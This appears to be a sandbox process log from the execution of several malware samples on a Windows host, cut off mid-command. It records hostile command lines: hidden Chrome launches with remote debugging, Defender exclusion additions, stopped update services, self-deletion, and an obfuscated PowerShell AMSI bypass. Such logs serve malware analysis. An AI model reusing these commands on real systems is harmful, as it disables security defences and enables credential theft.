"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\torque.exe

"C:\Users\Admin\Desktop\Files\torque.exe"

C:\Users\Admin\Desktop\Files\14082024.exe

"C:\Users\Admin\Desktop\Files\14082024.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\stealc_valenciga.exe

"C:\Users\Admin\Desktop\Files\stealc_valenciga.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7968 -ip 7968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1300

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 12680 -s 1372

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x128,0x12c,0x130,0xf4,0x134,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\injector.exe

"C:\Users\Admin\Desktop\Files\injector.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

\??\c:\users\admin\desktop\files\injector.exe 

c:\users\admin\desktop\files\injector.exe 

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4936 -ip 4936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1292

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\ldqj18tn.exe

"C:\Users\Admin\Desktop\Files\ldqj18tn.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\china.exe

"C:\Users\Admin\Desktop\Files\china.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\Files\ew.exe

"C:\Users\Admin\Desktop\Files\ew.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Desktop\Files\h5a71wdy.exe

"C:\Users\Admin\Desktop\Files\h5a71wdy.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5292 -ip 5292

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rxUZSeucghvE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tkTJHfFvGhTCzu,[Parameter(Position=1)][Type]$HJxhrzqmwR)$OEMRgOedrCw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'cte'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+'ul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'ss'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+'S'+[Char](101)+'aled'+[Char](44)+''+'A'+'n'+[Char](115)+'iC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+'C'+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$OEMRgOedrCw.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$tkTJHfFvGhTCzu).SetImplementationFlags(''+'R'+'u'+[Char](110)+'ti'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');$OEMRgOedrCw.DefineMethod('In'+'v'+'o'+'k'+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'deB'+[Char](121)+'Si'+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+'V'+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$HJxhrzqmwR,$tkTJHfFvGhTCzu).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $OEMRgOedrCw.CreateType();}$lEEpcPeWgbqjE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+'ll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+'o'+'so'+[Char](102)+''+'t'+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$GhnaXaSdbUhylH=$lEEpcPeWgbqjE.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+'o'+[Char](99)+'Ad'+[Char](100)+'r'+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DIOUIrvOSfgWoJRURYl=rxUZSeucghvE @([String])([IntPtr]);$fVJvxeIMIaAKBIppKiOpBK=rxUZSeucghvE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$InhSEnuVnzP=$lEEpcPeWgbqjE.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ZNZGdYqEptPMOz=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$InhSEnuVnzP,[Object]('L'+'o'+''+'a'+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$tAyRzHzFGduBivAvn=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$InhSEnuVnzP,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$OEeIiUk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZNZGdYqEptPMOz,$DIOUIrvOSfgWoJRURYl).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$VTLUQUXkcFxmEkjxZ=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$OEeIiUk,[Object](''+'A'+'m'+'s'+'i'+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$iiYEfOiPLZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAyRzHzFGduBivAvn,$fVJvxeIMIaAKBIppKiOpBK).Invoke($VTLUQUXkcFxmEkjxZ,[uint32]8,4,[ref]$iiYEfOiPLZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VTLUQUXkcFxmEkjxZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAyRzHzFGduBivAvn,$fVJvxeIMIaAKBIppKiOpBK).Invoke($VTLUQUXkcFxmEkjxZ,[uint32]8,0x20,[ref]$iiYEfOiPLZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+